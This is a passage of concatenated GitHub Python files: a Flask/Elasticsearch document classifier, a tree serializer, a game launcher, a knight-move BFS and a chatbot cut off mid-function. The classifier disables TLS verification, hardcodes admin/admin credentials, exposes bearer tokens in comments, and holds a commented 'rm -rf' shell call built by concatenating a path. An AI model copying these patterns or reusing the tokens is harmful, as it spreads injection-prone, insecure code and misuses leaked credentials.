os.path.normpath(os.path.join(log_location, \"classifier_log.log\"))\nloginfo_filename = config['CLASSIFIER']['LOGINFO_FILENAME']\nlogdebug_filename = config['CLASSIFIER']['LOGDEBUG_FILENAME']\nerror_code=config['CLASSIFIER']['CLASSIFIER_ERROR_CODE']\nwrite_file_system = config['CLASSIFIER']['FILE_OUT']\nocr_store_full_text = int(config['CLASSIFIER']['OCR_STORE_FULL_TEXT'])\n\nmodel_path = os.path.normpath(os.path.join(model_location, class_model_pkl))\nvec_model_path = os.path.normpath(os.path.join(model_location, vector_model_pkl))\nes_host = config['CLASSIFIER']['ES_HOST']\nes_port = config['CLASSIFIER']['ES_PORT']\nindex = config['CLASSIFIER']['INDEX']\n\n\nssl_context = create_ssl_context()\nssl_context.check_hostname = False\nssl_context.verify_mode = ssl.CERT_NONE\nes = Elasticsearch([{'host': es_host, 'port': es_port}],scheme=\"https\",\n # to ensure that it does not use the default value `True`\n verify_certs=False,\n ssl_context= ssl_context,\n http_auth=(\"admin\", \"admin\"))\n\ndt = str(datetime.datetime.now()).replace(\":\",\"_\")\nnewname = 'classifier_loginfor.log'+'.zip'+dt+'.zip'\nnewname_debug = 'classifier_logdebug.log'+'.zip' +dt+ '.zip'\nif os.path.exists('classifier_loginfor.log' +'.zip'):\n os.rename('classifier_loginfor.log' +'.zip', newname)\n shutil.move(newname,log_location )\nif os.path.exists('classifier_logdebug.log' +'.zip'):\n os.rename('classifier_logdebug.log' +'.zip', newname_debug)\n shutil.move(newname_debug,log_location )\nlogger.add('classifier_loginfor.log' , format=\"{time} {message} | {level} | {message}\", backtrace=True, level='INFO', rotation=\"1 day\", enqueue=True, compression=\"zip\")\nlogger.add('classifier_logdebug.log' , format=\"{time} {message} | {level} | {message}\", backtrace=True, level='DEBUG', rotation=\"1 day\", enqueue=True, compression=\"zip\")\n\n\ndef remove_stop_words(text):\n import spacy\n from spacy.lang.en import English\n from spacy.lang.en.stop_words import STOP_WORDS\n nlp = English()\n # \"nlp\" Object is used to create documents with linguistic annotations.\n document = nlp(text)\n # Create list of word tokens\n token_list = []\n for token in document:\n token_list.append(token.text)\n\n # Create list of word tokens after removing stopwords\n filtered_sentence = []\n for word in token_list:\n lexeme = nlp.vocab[word]\n if lexeme.is_stop == False:\n filtered_sentence.append(word)\n return ' '.join(filtered_sentence)\n\ntemplates = []\nfor name in os.listdir(root_dir):\n templates.append(name)\nlogger.info(\"\\n\\n templates : {}\", templates)\n\n\nfrom sklearn import preprocessing\nle = preprocessing.LabelEncoder()\nle.fit(templates)\ntemplate_id = le.transform(le.classes_)\ncategorydf = pd.DataFrame({'template_id': template_id, 'templates': templates})\ncategorydf = categorydf.sort_values('template_id')\nid_to_category = dict(categorydf[['template_id', 'templates']].values)\nlogger.info(\" \\n\\n id_to_category : {}\", id_to_category)\n\n\nunclassified_dict = {}\nprediction_json = {}\n\n\ndef tokenize_stem(text):\n from nltk.stem.snowball import SnowballStemmer\n stemmer = SnowballStemmer(\"english\")\n logger.info(\"\\n\\n tokenize_stem : {}\")\n tokens = [word for sent in nltk.sent_tokenize(text) for word in nltk.word_tokenize(sent)]\n filtered_tokens = []\n # filter out any tokens not containing letters (e.g., numeric tokens, raw punctuation)\n for token in tokens:\n if re.search('[a-zA-Z]', token):\n filtered_tokens.append(token)\n stems = [stemmer.stem(t) for t in filtered_tokens]\n return stems\n\n\ndef file_validation(file_name,file_size):\n is_valid = False\n logger.info(\" file_validation : {}\", file_name)\n print(\" file_name :\",file_name)\n print(\" File Size :\",file_size)\n if os.path.exists(file_name) and os.access(file_name,os.R_OK) and (min_file_size <= file_size ) and (max_file_size >= file_size) :\n is_valid = True\n logger.info(\" file_validation : {}\",file_validation)\n print(\"file_validation ->\",is_valid)\n return is_valid\n\n\ndef get_file_name(file_path):\n filename = ''\n if len(file_path) > 1:\n filename = os.path.splitext(os.path.basename(file_path))[0]\n return str(filename)\n\n\ndef add_unclassified_docs(group_details,disc_inbound_id,org_filename,is_training,auth_key):\n unclassified_dict = {}\n try:\n if group_details['error_code'] == 0 and group_details['group_no'] is not None and int(group_details['group_no']) > 0 :\n prediction_json[\"group_no\"] = group_details['group_no']\n prediction_json[\"unclassified_file_name\"] = group_details['unclassified_file_name']\n unclassified_dict['DiscoveryInBoundId'] = disc_inbound_id\n unclassified_dict['ClassificationGroupId'] = int(group_details['group_no'])\n unclassified_dict['FileLocation'] = group_details['file_name']\n logger.info(\"\\n\\n\\n **************** class :group_details : {} \", group_details['file_name'])\n unclassified_dict['Name'] = org_filename\n unclassified_dict['DisplayName'] = org_filename\n unclassified_dict['IsTemplate'] = group_details['new_group']\n unclassified_dict['IsTrainingDocument'] = is_training\n #classifier_transactions.add_unclassified_doc_info(unclassified_dict,auth_key)\n else:\n prediction_json[\"error_msg\"] = group_details['error_msg']\n prediction_json[\"error_code\"] = group_details['error_code']\n #classifier_transactions.update_inbound_status(disc_inbound_id,auth_key)\n except Exception as error:\n print(error)\n #classifier_transactions.update_inbound_status(disc_inbound_id)\n #error_updation.exception_log(error, \" Error occurred when adding unclassified details \", str(disc_inbound_id))\n\n\n@app.route('/'+config['CLASSIFIER']['CLASSIFIER_URL_NAME'], methods=['POST'])\ndef classifier():\n from flask import jsonify,request\n dfx_data = request.get_json(force=True)\n logger.info(\" classifier JSON: {}\",type(dfx_data))\n # filename = data['file_name']\n # disc_inbound_id = data['inbound_id']\n # is_training_source = data['IsTrainingSource']\n # is_unclassified = data['is_unclassified']\n details = classification(dfx_data)\n logger.info(\"\\n classifier :{}\", details)\n return jsonify(details)\n\n\n# def classification(dfx_data):\n# import gc\n# try:\n# prediction_json['error_code'] = 0\n# prediction_json[\"error_msg\"] = ''\n# filename = dfx_data['file_name']\n# prediction_json['disc_inbound_id'] = dfx_data['inbound_id']\n# auth_key = dfx_data['Authorization']\n# is_training_source = 0\n# if dfx_data['FileLength'] is not None and type(dfx_data['FileLength']) is not int:\n# file_size = int(dfx_data['FileLength'])\n# else:\n# file_size = dfx_data['FileLength']\n# disc_inbound_id = dfx_data['inbound_id']\n# if dfx_data['IsTrainingSource'] is not None and type(dfx_data['IsTrainingSource']) is not int:\n# is_training_source = int(dfx_data['IsTrainingSource'])\n# is_unclassified = dfx_data['is_unclassified']\n# data_processing = {}\n# if file_validation(filename,file_size) and int(disc_inbound_id) > 0 :\n# if int(is_unclassified) == 1:\n# data_processing['text_file_name'] = filename\n# data_processing['error_code'] = 0\n# else:\n# data_processing = doc_processing.filter_text_from_file(filename,disc_inbound_id,auth_key)\n# logger.info(\"\\n\\n\\n data_processing: {}\", data_processing)\n# if int(data_processing['error_code']) is not 2 and data_processing['text_file_name'] is not None and data_processing['text_file_name'].strip() is not '' and int(data_processing['error_code']) == 0 and len(data_processing['text_file_name'].strip()) > 1 :\n# txt_filename = data_processing['text_file_name']\n# text_extraction = ''\n# logger.info(\" \\n Classification: txt_filename {}\",txt_filename)\n# with open(txt_filename, 'rb') as text_file:\n# #text_extraction = text_file.read()\n# text_raw = ''+(text_file.read()).decode()\n# # logger.info(text_raw)\n# text_extraction = remove_stop_words(text_raw)\n# # logger.info(text_extraction)\n# if os.path.exists(vec_model_path) and os.path.exists(model_path):\n# global is_model_enabled\n# is_model_enabled = True\n# logger.info(\"\\n\\n is_model_enabled : {}\",is_model_enabled)\n# if len(filename.strip()) > 1 and text_extraction is not None and len(text_extraction.strip()) > 0 and is_model_enabled :\n# logger.info(\" Prediction Section : ******************** \\n\")\n# features_list=vectorizer_model.transform([text_extraction]) # .toarray()\n# prediction=classifier_model.predict(features_list)\n# prediction_id = int(prediction)\n# logger.debug(\"\\n\\n prediction : {}\", prediction_id)\n# proba_pred=classifier_model.predict_proba(features_list)\n# new_doc_classifier=proba_pred[:, prediction_id]\n# logger.info(\"\\n\\n new_doc_classifier: {}\", new_doc_classifier, float(classification_model_accuracy), float(new_doc_classifier))\n# if is_training_source == 0 and float(new_doc_classifier) >= float(classification_model_accuracy):\n# class_dict = {}\n# class_id = 0\n# logger.info(\"Prediction : {}\", prediction_id)\n# logger.info(\"Prediction Probability :{}\", proba_pred[:, prediction_id])\n# prediction_json[\"file_name\"] = filename\n# prediction_json[\"predition_type\"] = new_doc_classifier\n# class_name = id_to_category.get(int(prediction_id))\n# org_subclass_id = classifier_transactions.find_subclassification_id(class_name,auth_key)\n# logger.info(\"\\n\\n class_name : {}\", class_name)\n# prediction_json['predicted_category'] = class_name\n# class_dict[\"ClassificationTemplateId\"] = classifier_transactions.find_classification_id(org_subclass_id,auth_key)\n# class_dict[\"SubClassificationTemplateId\"] = org_subclass_id\n# class_dict[\"Type\"] = class_name\n# class_dict[\"DiscoveryInBoundId\"] = int(disc_inbound_id)\n# # predicted_dir_name = os.path.normpath(os.path.join(class_predicted_loc,class_name))\n# # if not os.path.exists(predicted_dir_name):\n# # os.makedirs(predicted_dir_name, mode=0o777, exist_ok=False)\n# # logger.info(\"predicted_file_name:{}\",predicted_dir_name)\n# class_id = classifier_transactions.save_classified_result(class_dict,txt_filename,auth_key)\n# logger.info(\"\\n\\n **************** class_id : {}\", class_id)\n# if is_unclassified is not None and int(is_unclassified) == 1:\n# classifier_transactions.update_unclassified_status(dfx_data['unclass_id'],auth_key)\n# if os.path.exists(txt_filename):\n# os.remove(txt_filename)\n# dir_name = os.path.split(txt_filename)[0]\n# temp_file_name = os.path.split(txt_filename)[1]\n# template_loc = os.path.normpath(os.path.join(sim_template_loc ,os.path.split(dir_name)[1]))\n# print( \"\\n dir_name:\",dir_name,\"\\n temp_file_name: \",temp_file_name,\"\\n template_loc\" , template_loc )\n# if os.path.exists(template_loc) and os.path.isdir(template_loc) and len(\n# os.listdir(dir_name)) == 0:\n# # os.remove(os.path.normpath(os.path.join(template_loc, temp_file_name)))\n# os.system(\"rm -rf \"+template_loc)\n# import shutil\n# shutil.rmtree(dir_name)\n# import shutil\n# if os.path.exists(txt_filename):\n# os.remove(txt_filename)\n# elif is_training_source == 1 and float(new_doc_classifier) >= float(classification_model_accuracy):\n# if os.path.exists(txt_filename):\n# os.remove(txt_filename)\n# prediction_json[\"error_msg\"] = \" The document is marked for training \"\n# prediction_json['error_code'] = 1\n# classifier_transactions.update_inbound_status(disc_inbound_id,auth_key)\n# error_updation.custom_error_update_log(\" Duplicate training document \", \" Duplicate training document \",\n# str(disc_inbound_id))\n# elif int(is_unclassified) is not 1:\n# group_details = find_group(txt_filename,auth_key)\n# add_unclassified_docs(group_details, disc_inbound_id,get_file_name(filename), is_training_source,auth_key)\n# elif len(filename.strip()) > 1 and text_extraction is not None and len(text_extraction.strip()) > 1 and not is_model_enabled:\n# group_details = find_group(txt_filename,auth_key)\n# add_unclassified_docs(group_details, disc_inbound_id, get_file_name(filename), is_training_source,auth_key)\n# else:\n# prediction_json[\"error_msg\"] = data_processing['error_msg']\n# prediction_json['error_code'] = int(data_processing['error_code'])\n# classifier_transactions.update_inbound_status(disc_inbound_id,auth_key)\n# logger.info(\" prediction_json: {}\", prediction_json)\n# error_updation.custom_error_update_log(data_processing['error_msg'],\n# data_processing['error_msg'],\n# str(disc_inbound_id))\n# else:\n# prediction_json[\"error_msg\"] = \" Kindly check the document's path/read permission/size \"\n# prediction_json['error_code'] = 1\n# classifier_transactions.update_inbound_status(disc_inbound_id,auth_key)\n# error_updation.custom_error_update_log(\" Kindly check the document's path/permission/size \", \" Kindly check the document's path/permission/size \", str(disc_inbound_id))\n# logger.debug(prediction_json)\n# logger.info(\"\\n\\n prediction_json {}\", prediction_json)\n# except Exception as exception:\n# classifier_transactions.update_inbound_status(disc_inbound_id,auth_key)\n# error_updation.exception_log(exception, prediction_json, str(disc_inbound_id))\n# # prediction_json['error_code'] = 1\n# logger.debug(\"\\n\\n exception: {}\", exception)\n# prediction_json[\"error_msg\"] = \" Document Exception : \"+str(exception)\n# return json.dumps(str(prediction_json))\n# # tagging the text files\n\ndef eliminating_classified():\n return {\n \"size\": 5000,\n \"query\": {\n \"bool\": {\n \"filter\": {\n \"wildcard\": {\n \"content\": \"*\"\n }\n },\n\n \"must_not\": [\n {\"exists\": {\"field\": \"classified\"}},\n {\"exists\": {\"field\": \"group_no\"}}\n ]\n }\n }\n}\n\n\n\n\n\ndef classification(auth_key):\n import gc\n #try:\n data_processing = {}\n #disc_inbound_id = dfx_data['inbound_id']\n filter_classified = es.search(index=index, body=eliminating_classified())\n raw_data = filter_classified['hits']['hits']\n for data in raw_data:\n es_id = data['_id']#urllib.parse.quote(data['_id'], safe='')\n print(es_id)\n inbound_id=data['_source']['resourceName']\n content = data['_source']['content']\n uri= data['_source']['uri']\n data_processing = doc_processing.filter_text_from_file(inbound_id,content,'auth_key')\n logger.info(\"\\n\\n\\n data_processing: {}\", data_processing)\n txt_filename = data_processing['text_file_name']\n text_extraction = ''\n logger.info(\" \\n Classification: txt_filename {}\",txt_filename)\n\n if os.path.exists(vec_model_path) and os.path.exists(model_path):\n global is_model_enabled\n is_model_enabled = True\n logger.info(\"\\n\\n is_model_enabled : {}\",is_model_enabled)\n with open(txt_filename, 'rb+') as text_file:\n # text_extraction = text_file.read()\n text_raw = '' + (text_file.read()).decode()\n # logger.info(text_raw)\n text_extraction = remove_stop_words(text_raw)\n # logger.info(text_extraction)\n if text_extraction is not None and len(text_extraction.strip()) > 0 and is_model_enabled :\n logger.info(\" Prediction Section : ******************** \\n\")\n features_list=vectorizer_model.transform([text_extraction]) # .toarray()\n prediction=classifier_model.predict(features_list)\n prediction_id = int(prediction)\n logger.debug(\"\\n\\n prediction : {}\", prediction_id)\n proba_pred=classifier_model.predict_proba(features_list)\n new_doc_classifier=proba_pred[:, prediction_id]\n logger.info(\"\\n\\n new_doc_classifier: {}\", new_doc_classifier, float(classification_model_accuracy), float(new_doc_classifier))\n if float(new_doc_classifier) >= float(classification_model_accuracy):\n class_dict = {}\n class_id = 0\n logger.info(\"Prediction : {}\", prediction_id)\n logger.info(\"Prediction Probability :{}\", proba_pred[:, prediction_id])\n prediction_json[\"file_name\"] = inbound_id\n prediction_json[\"predition_type\"] = new_doc_classifier\n class_name = id_to_category.get(int(prediction_id))\n #org_subclass_id = classifier_transactions.find_subclassification_id(class_name,auth_key)\n logger.info(\"\\n\\n class_name : {}\", class_name)\n prediction_json['predicted_category'] = class_name\n classified_doc_update(class_name,prediction_json[\"predition_type\"][0],content,uri)\n\n # class_dict[\"ClassificationTemplateId\"] = classifier_transactions.find_classification_id(org_subclass_id,auth_key)\n # class_dict[\"SubClassificationTemplateId\"] = org_subclass_id\n # class_dict[\"Type\"] = class_name\n # class_dict[\"DiscoveryInBoundId\"] = int(inbound_id)\n\n #--class_id = classifier_transactions.save_classified_result(class_dict,txt_filename,auth_key)\n #--logger.info(\"\\n\\n **************** class_id : {}\", class_id)\n# if is_unclassified is not None and int(is_unclassified) == 1:\n# classifier_transactions.update_unclassified_status(dfx_data['unclass_id'],auth_key)\n else:\n group_details = find_group(txt_filename, auth_key)\n\n unclassified_doc_update(uri, str(group_details['accuracy_rate']),content,str(group_details['group_no']),str(group_details['group_file_path']),str(group_details['doc_name']))\n elastic_update = update_group_es(es_id, str(group_details['group_no']))\n\n\n\n else:\n group_details = find_group(txt_filename,auth_key)\n print(group_details)\n unclassified_doc_update(uri, str(group_details['accuracy_rate']), content, str(group_details['group_no']),str(group_details['group_file_path']),str(group_details['doc_name']))\n elastic_update = update_group_es(es_id, str(group_details['group_no']))\n\n #print(unclassified_doc_update(uri,))\n #add_unclassified_docs(group_details, inbound_id, get_file_name(txt_filename), \"0\",auth_key)\n\n \n \n # except Exception as exception:\n # #classifier_transactions.update_inbound_status(disc_inbound_id,auth_key)\n # #error_updation.exception_log(exception, prediction_json, str(disc_inbound_id))\n # # prediction_json['error_code'] = 1\n # logger.debug(\"\\n\\n exception: {}\", exception)\n #prediction_json[\"error_msg\"] = \" Document Exception : \"+str(exception)\n return json.dumps(str(prediction_json))\n\n\nif __name__ == '__main__':\n if os.path.exists(vec_model_path) and os.path.exists(model_path):\n logger.info(\"{} \\n\\n\\n\")\n from pyfiglet import Figlet\n f = Figlet(font='slant')\n logger.info(\"{}\", f.renderText('DFX CLASSIFIER ') + \"v 0.1\")\n with open(model_path, 'rb') as model_file:\n classifier_model = pickle.load(model_file)\n with open(vec_model_path, 'rb') as vec_model:\n vectorizer_model = pickle.load(vec_model)\n is_model_enabled = True\n logger.info(\" \\n\\n classification :-> is_model_enabled : {}\", int(is_model_enabled))\n #classifier_api = os.path.normpath(os.path.join(config['CLASSIFIER']['CLASSIFIER_HOST'], config['CLASSIFIER']['CLASSIFIER_URL_NAME']))\n # print(classification(r'\\\\192.168.0.14\\Users\\giri\\Desktop\\Credit_Card_Agreements_2018_Q3\\1st Financial Bank USA\\MasterCard or Visa Credit Card Agreement.pdf',9))\n # payload = {}\n # payload['file_name'] = r'C:\\Users\\baskaran\\Desktop\\Milton.pdf'\n # payload['unclass_id'] = 0\n # payload['inbound_id'] = 354\n # payload['IsTrainingSource'] = 0\n # payload['is_unclassified'] = 0\n # payload['FileLength'] = 24546\n # payload['Authorization'] = 'bearer PJZ45ervujGYDWxe0lxRzDPG0fORLHfbaSYHEgDnpUBKF-ueDNlKIWZoNpHUWzNLHVeR5pjcVyRuQpAOn4Ae759UQxT5sH1eshjjR13REREOdr7TfuOXCQhUTFhNUqf8iJChuJjZbXdNYqEnqFX6osHv5YBJbyer5IoiquNOkejk-TQplGJd0gL1_AoT19k_TDpqijaCsZtoHrYRt2ORNaWebl0cdd9pi7jWdYLX6vHnA3c1nxjEQsVjHAxkGIDPGKKYVQPaoXtsDcw6Uk0ypN4siyzdcPj2hWOX7TUWNsI'\n # print(classification(payload))\n # {\"file_name\": \"\\\\\\\\WIN-EN47KDFIU2V\\\\CRMFiles\\\\fsfdfsdfK.docx\", \"unclass_id\": 0, \"inbound_id\": 265,\n # \"IsTrainingSource\": 0, \"is_unclassified\": 0,\n # \"Authorization\": \"bearer 6aAHmqDL4XmXLXAX6lbqhQSTVGR15n8pSaMFIcHn9V0GRhGHHnX4NOf6oSZRHdL9hkjR3U21O6RD8fzRafZIuQpvayXq_hq3qkYrCprUxgbNSj-b9_atmSVzmQlMCqkARfmmxabZqMCP6qKaWM5HyncQvps5SDi9yExt4jGE5qZaRT3DicWlPq1LEdaHKrfAUDX5yNL-PYJyiTmHFiAw-8wUgk0GxvoAGRnhPMTrZo3ZE2nMlDT5SDaJDc40YIMZ9EvgzziV0nj_kWYn5eMezKgcWCbgjfxNpTUEXpZo8lA\",\n # \"FileLength\": null}\n # {\"file_name\": \"\\\\\\\\WIN-EN47KDFIU2V\\\\CRMFiles\\\\9PYMPC_tic.pdf\", \"unclass_id\": 0, \"inbound_id\": 207,\n # \"IsTrainingSource\": 0, \"is_unclassified\": 0,\n # \"Authorization\": \"bearer PJZ45ervujGYDWxe0lxRzDPG0fORLHfbaSYHEgDnpUBKF-ueDNlKIWZoNpHUWzNLHVeR5pjcVyRuQpAOn4Ae759UQxT5sH1eshjjR13REREOdr7TfuOXCQhUTFhNUqf8iJChuJjZbXdNYqEnqFX6osHv5YBJbyer5IoiquNOkejk-TQplGJd0gL1_AoT19k_TDpqijaCsZtoHrYRt2ORNaWebl0cdd9pi7jWdYLX6vHnA3c1nxjEQsVjHAxkGIDPGKKYVQPaoXtsDcw6Uk0ypN4siyzdcPj2hWOX7TUWNsI\"}\n # {\"file_name\": \"\\\\\\\\192.168.0.14\\\\dfx\\\\crm_tmp\\\\2~~d87a4763-8b07-ea11-b806-00155d00090f~~8M1XMA_tic.pdf\",\n # \"unclass_id\": 0, \"inbound_id\": 1, \"IsTrainingSource\": 0, \"is_unclassified\": 0,\n # \"Authorization\": \"bearer 9jYF-wEagkECw_DX75Y80W69TT3m6YQGqQNST4XHhaxb3uiUYTlAYxJnrddmLVB3YXl4p-zPK_KecjmVX3LAZEd0gvbpcILM4ItbYyCwe8dB3Huj8qScXsFpH_ccUAOZydigKLxKR_Px4OICZKGsbxQYQOEhHdDGuDMPxybNDksFNp1L7PrBSWAzs18AmfUDE7RDiHCRDmdkBihJHLPU_AdqAwfJy5Oj2dahFGZVhfcoIb7u-7dr0ok-u5dymJlziEc40M3A9hTYHS4bj9wkAfCuJX7iDx550RW20hh2dZI\"}\n #app.run(host=config['CLASSIFIER']['CLASSIFIER_HOST'], port=config['CLASSIFIER']['API_PORT_NUMBER'], debug=False, threaded = True)\n classification(\"auth_key\")\n\n","repo_name":"giridharanbabu/DFXClassification_V1","sub_path":"classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":26535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"46978979527","text":"class TreeNode:\r\n def __init__(self, x):\r\n self.val = x\r\n self.left = None\r\n self.right = None\r\n\r\ndef Serialize(root):\r\n if not root: return ''\r\n que = [root]\r\n t = [root.val]\r\n while que:\r\n n = len(que)\r\n h_level = []\r\n for _ in range(n):\r\n node = que.pop(0)\r\n if not node.left and not node.right: break\r\n if node.left:\r\n que.append(node.left)\r\n h_level.append(node.left.val)\r\n else: \r\n h_level.append('#')\r\n if node.right:\r\n que.append(node.right)\r\n h_level.append(node.right.val)\r\n else: \r\n h_level.append('#')\r\n t += h_level\r\n t.append('!')\r\n t = map(str, t)\r\n return ','.join(t)\r\n\r\n\r\ndef Deserialize(s):\r\n if not s: return None\r\n s = s.split(',')\r\n root = TreeNode(int(s[0]))\r\n q = [root]\r\n i = 1\r\n while i < len(s)-1:\r\n node = q.pop(0)\r\n if s[i] == '!':\r\n break\r\n if s[i] == '#':\r\n node.left = None\r\n else:\r\n node.left = TreeNode(int(s[i]))\r\n q.append(node.left)\r\n if s[i+1] == '!':\r\n break\r\n if s[i+1] == '#':\r\n node.right = None\r\n else:\r\n node.right = TreeNode(int(s[i+1]))\r\n q.append(node.right)\r\n i += 2\r\n return root\r\n\r\n\r\n\r\n\r\n\r\n\r\n# root = TreeNode(5)\r\n# root.left = TreeNode(4)\r\n# root.left.left = TreeNode(3)\r\n# root.left.left.left = TreeNode(2)\r\n\r\nroot = TreeNode(8)\r\nroot.left = TreeNode(6)\r\nroot.right = TreeNode(10)\r\nroot.left.left = TreeNode(5)\r\nroot.left.right = TreeNode(7)\r\nroot.right.left = TreeNode(9)\r\nroot.right.right = TreeNode(11)\r\n\r\na = Serialize(root)\r\nprint(a)\r\nb = Deserialize(a)\r\nprint(Serialize(b))\r\n\r\ns = []\r\ndef dfs(root):\r\n if not root: return \r\n s.append(root.val)\r\n dfs(root.left)\r\n dfs(root.right)\r\n\r\ndfs(root)\r\nprint(s)\r\n\r\n\r\n\r\n\r\n'''\r\n链接:https://www.nowcoder.com/questionTerminal/cf7e25aa97c04cc1a68c8f040e71fb84?f=discussion\r\n来源:牛客网\r\n\r\ntypedef TreeNode node;\r\ntypedef TreeNode* pnode;\r\ntypedef int* pint;\r\nclass Solution {\r\n vector buf;\r\n void dfs(pnode p){\r\n if(!p) buf.push_back(0x23333);\r\n else{\r\n buf.push_back(p -> val);\r\n dfs(p -> left);\r\n dfs(p -> right);\r\n }\r\n }\r\n pnode dfs2(pint& p){\r\n if(*p == 0x23333){\r\n ++p;\r\n return NULL;\r\n }\r\n pnode res = new node(*p);\r\n ++p;\r\n res -> left = dfs2(p);\r\n res -> right = dfs2(p);\r\n return res;\r\n }\r\npublic:\r\n char* Serialize(TreeNode *p) {\r\n buf.clear();\r\n dfs(p);\r\n int *res = new int[buf.size()];\r\n for(unsigned int i = 0; i < buf.size(); ++i) res[i] = buf[i];\r\n return (char*)res;\r\n }\r\n TreeNode* Deserialize(char *str) {\r\n int *p = (int*)str;\r\n return dfs2(p);\r\n }\r\n};\r\n\r\n'''","repo_name":"asd55667/Jianzhi_offer","sub_path":"61Serialize_Deserialize.py","file_name":"61Serialize_Deserialize.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"23368408427","text":"import argparse\nfrom voronoi_game import VoronoiGame\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--spawn\", type=int, default=5, help=\"Number of days after which a new unit spawns at the \"\n \"homebase\")\n parser.add_argument(\"--last\", type=int, default=100, help=\"Total number of days the game goes on for\")\n parser.add_argument(\"--seed\", \"-s\", type=int, default=2, help=\"Seed used by random number generator, specify 0 to \"\n \"use no seed and have different random behavior on \"\n \"each launch\")\n parser.add_argument(\"--port\", type=int, default=8080, help=\"Port to start, specify -1 to auto-assign\")\n parser.add_argument(\"--address\", \"-a\", type=str, default=\"127.0.0.1\", help=\"Address\")\n parser.add_argument(\"--no_browser\", \"-nb\", action=\"store_true\", help=\"Disable browser launching in GUI mode\")\n parser.add_argument(\"--no_gui\", \"-ng\", action=\"store_true\", help=\"Disable GUI\")\n parser.add_argument(\"--log_path\", default=\"log\", help=\"Directory path to dump log files, filepath if \"\n \"disable_logging is false\")\n parser.add_argument(\"--disable_logging\", action=\"store_true\", help=\"Disable Logging, log_path becomes path to file\")\n parser.add_argument(\"--disable_timeout\", action=\"store_true\", help=\"Disable timeouts for player code\")\n parser.add_argument(\"--player1\", \"-p1\", default=\"d\", help=\"Specifying player 1 out of 4\")\n parser.add_argument(\"--player2\", \"-p2\", default=\"d\", help=\"Specifying player 2 out of 4\")\n parser.add_argument(\"--player3\", \"-p3\", default=\"d\", help=\"Specifying player 3 out of 4\")\n parser.add_argument(\"--player4\", \"-p4\", default=\"d\", help=\"Specifying player 4 out of 4\")\n parser.add_argument(\"--dump_state\", action=\"store_true\", help=\"Dump game.pkl for rendering\")\n args = parser.parse_args()\n player_list = tuple([args.player1, args.player2, args.player3, args.player4])\n del args.player1\n del args.player2\n del args.player3\n del args.player4\n\n if args.disable_logging:\n if args.log_path == \"log\":\n args.log_path = \"results.log\"\n \n voronoi_game = VoronoiGame(player_list, args)\n","repo_name":"rvg-18227/Voronoi","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"10081169512","text":"import sys\nsys.stdin = open(\"input.txt\")\nfrom collections import deque\n\ndef knight():\n global cnt\n dx = [1, 1, -1, -1, 2, 2, -2, -2]\n dy = [2, -2, 2, -2, 1, -1, 1, -1]\n # 시작점\n q = deque([[sx,sy]])\n while q:\n x,y = q.popleft()\n # 이동하려는 칸 도착시 현재칸 까지 이동횟수 리턴\n if x == lx and y == ly:\n cnt = graph[x][y]\n\n return graph[x][y]\n # 나이트 이동 방향 탐색\n for k in range(8):\n nx = x + dx[k]\n ny = y + dy[k]\n # 범위 내 있고 탐색 X 탐색\n if 0 <= nx < I and 0 <= ny < I:\n if not graph[nx][ny]:\n q.append([nx, ny])\n graph[nx][ny] = graph[x][y] + 1 # 이동횟수 초기화\n\n\nT = int(input())\nfor tc in range(1, T+1):\n I = int(input())\n graph = [[0 for _ in range(I)] for _ in range(I)]\n sx, sy = map(int, input().split())\n lx, ly = map(int, input().split())\n cnt = 0\n knight()\n print(cnt)\n # print(graph)","repo_name":"MalangCowFarm/Algo_JinHwan","sub_path":"week 9/나이트의 이동_7562(BOJ)/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"70283989982","text":"import numpy\nimport random\nimport string\nimport nltk\nimport nltk.corpus\nimport nltk.tokenize.punkt\nimport string\nfrom nltk.stem.lancaster import LancasterStemmer\nimport json\nimport pickle\nimport requests\nimport re\nfrom collections import Counter\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom framework.constants import log as log\n\nnltk.download('punkt')\nnltk.download('stopwords')\n\n# Create tokenizer\nstemmer = LancasterStemmer()\nstopwords = nltk.corpus.stopwords.words('english')\nstopwords.extend(string.punctuation)\nstopwords.append('')\ntokenizer = nltk.tokenize.WordPunctTokenizer()\n\ndef train(inp):\n with open(\"intents.json\") as file:\n data = json.load(file)\n try:\n with open(\"data.pickle\", \"rb\") as f:\n words, labels, training, output = pickle.load(f)\n except:\n words = []\n labels = []\n docs_x = []\n docs_y = []\n\n for intent in data[\"intents\"]:\n for pattern in intent[\"patterns\"]:\n wrds = nltk.word_tokenize(pattern)\n words.extend(wrds)\n docs_x.append(wrds)\n docs_y.append(intent[\"tag\"])\n\n if intent[\"tag\"] not in labels:\n labels.append(intent[\"tag\"])\n\n words = [stemmer.stem(w.lower()) for w in words if w != \"?\"]\n words = sorted(list(set(words)))\n\n labels = sorted(labels)\n\n training = []\n output = []\n\n out_empty = [0 for _ in range(len(labels))]\n\n for x, doc in enumerate(docs_x):\n bag = []\n\n wrds = [stemmer.stem(w.lower()) for w in doc]\n\n for w in words:\n if w in wrds:\n bag.append(1)\n else:\n bag.append(0)\n\n output_row = out_empty[:]\n output_row[labels.index(docs_y[x])] = 1\n\n training.append(bag)\n output.append(output_row)\n\n\n training = numpy.array(training)\n output = numpy.array(output)\n with open(\"data.pickle\", \"wb\") as f:\n pickle.dump((words, labels, training, output), f)\n\ndef eventhandle(inp):\n message = inp\n with open(\"nlp/intents.json\",'rb') as f:\n data = json.load(f)\n maxi = 0\n response_item = None\n for items in data[\"intents\"]:\n # regex = ''\n for b in items[\"patterns\"]:\n match = get_jaccard_sim(b,message)\n log.debug(str(match))\n # log.info(\"maxi : \", maxi)\n if(match > maxi):\n maxi = match\n response_item = items\n # log.info(\"maxi changes : \", maxi)\n if response_item is None:\n return \"Sorry I do not understand\"\n else: \n responses = response_item['responses']\n return random.choice(responses)\n\n\ndef get_cosine_sim(*strs): \n vectors = [t for t in get_vectors(*strs)]\n return 